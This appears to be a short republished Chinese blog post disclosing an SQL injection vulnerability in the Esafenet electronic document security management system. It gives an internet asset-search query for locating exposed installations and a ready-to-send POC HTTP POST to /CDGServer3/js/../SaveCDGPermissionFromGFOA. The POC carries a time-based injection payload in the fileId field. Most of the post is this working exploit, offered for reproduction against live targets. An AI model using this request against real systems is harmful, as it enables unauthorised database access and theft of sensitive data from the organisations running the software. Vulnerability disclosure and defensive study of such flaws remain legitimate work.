SQL注入漏洞

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
图片

漏洞信息

漏洞复现

复现信息

语法:

app='亿赛通-电子文档安全管理系统'
图片

测绘搜索

POC:

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1
漏洞复现

复现信息

图片

复现-1

图片

复现-2

更多内容

发现更多

图片

原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/90243.html

(0)
guozi's avatarguozi
上一篇 2024年6月5日 下午3:02
下一篇 2024年6月5日 下午3:20

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注